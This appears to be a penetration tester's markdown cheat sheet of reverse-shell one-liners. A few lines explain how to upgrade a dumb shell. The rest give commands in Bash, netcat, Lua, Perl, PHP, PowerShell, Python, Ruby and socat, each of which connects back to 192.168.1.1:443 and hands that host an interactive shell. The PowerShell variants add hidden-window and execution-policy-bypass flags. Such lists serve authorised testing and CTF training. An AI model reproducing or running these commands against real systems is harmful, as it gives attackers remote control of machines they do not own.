Shells cheathsheet
==================

[[_TOC_]]

#### Upgrade dumb shell
- Ctrl-Z/^Z the shell
- echo $TERM (xterm-256color)
- stty -a (rows 38; columns 116)
- stty raw -echo
- fg
- reset
- export SHELL=bash
- export TERM=xterm-256color
- stty rows 38 columns 116

#### Bash

    sh -i >& /dev/tcp/192.168.1.1/443 0>&1
    0<&196;exec 196<>/dev/tcp/192.168.1.1/443; sh <&196 >&196 2>&196

#### nc 

    nc -e /bin/sh 192.168.1.1 443
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 443 >/tmp/f

#### Lua

    lua5.1 -e 'local host, port = "192.168.1.1", 443 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

#### Perl

    perl -e 'use Socket;$i="192.168.1.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"443:{port}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

#### PHP

    php -r '$sock=fsockopen("192.168.1.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'
    php -r '$sock=fsockopen("192.168.1.1",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
    php -r '$sock=fsockopen("192.168.1.1",443);system("/bin/sh -i <&3 >&3 2>&3");'

#### PowerShell

    powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#### Python

    export RHOST="192.168.1.1";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

#### Ruby

    ruby -rsocket -e'f=TCPSocket.open("192.168.1.1",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.1","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

#### socat

    socat TCP:192.168.1.1:443 EXEC:sh
    socat TCP:192.168.1.1:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane

